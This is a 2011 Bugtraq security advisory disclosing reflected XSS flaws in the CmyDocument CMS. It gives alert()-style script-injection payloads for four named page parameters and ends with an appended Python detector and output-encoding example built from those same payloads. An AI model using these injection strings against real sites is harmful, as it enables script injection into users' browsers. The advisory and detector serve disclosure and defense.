Message-Id: <201111022302.pA2N22l2022642@sf01web2.securityfocus.com>
Date: Wed, 2 Nov 2011 23:02:02 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: CmyDocument Content Management Application - XSS Vulnerabilities

Title: CmyDocument Content Management Application - XSS Vulnerabilities

Software : CmyDocument Content Management Application

Software Version : Unknown (version update : 2010-01-10)

Vendor: http://cmydocument.com/ 

Vulnerability Published : 2011-07-11

Vulnerability Update Time :

Status : 

Impact : Medium

Bug Description :
CmyDocument Content Management Application (version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS.

Proof Of Concept :
1) username in login.asp, PoC:
POST http://192.168.10.202/login.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

2) username in login2.asp, PoC:
POST http://192.168.10.202/login2.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

3) x_Revised in myDoclist.asp, PoC:
http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

4) x_Revised in myWebDoclist.asp, PoC:
http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
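
The following is an added example, not part of the original advisory and not code from the vendor: a Python check that flags requests carrying HTML metacharacters in the four page/parameter pairs listed above, plus the output encoding that keeps such a value inside an attribute. The function names and the rendered `<input>` markup are assumptions; the sample requests are constructed from the PoC values in the advisory and one benign login.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# Page/parameter pairs named in the advisory (compared case-insensitively).
AFFECTED = {
    "/login.asp": {"username"},
    "/login2.asp": {"username"},
    "/mydoclist.asp": {"x_revised"},
    "/mywebdoclist.asp": {"x_revised"},
}
# Characters that let a value leave an HTML attribute or text context.
HTML_META = set("<>\"'")

def suspicious_params(url, body=""):
    """Return [(param, decoded_value)] for affected parameters that carry HTML metacharacters."""
    parts = urlsplit(url)
    watched = AFFECTED.get(parts.path.lower(), set())
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return [(k, v) for k, v in pairs
            if k.lower() in watched and HTML_META & set(v)]

def render_username_field(value):
    """Echo a value into an attribute (hypothetical markup); quote=True also escapes " and '."""
    return '<input name="username" value="%s">' % html.escape(value, quote=True)

# Constructed sample requests: (url, POST body).
SAMPLES = [
    ("http://192.168.10.202/login.asp",
     "username=\"><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++"),
    ("http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE"
     "&x_Revised=<SCRIPT>alert(\"demonalex\");</SCRIPT>&z_Revised==&x_KeyWords=info", ""),
    ("http://192.168.10.202/login.asp", "username=alice&password=bbb"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        for name, value in suspicious_params(url, body):
            print("flagged %s on %s" % (name, urlsplit(url).path))
            print("  encoded form:", html.escape(value, quote=True))
```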
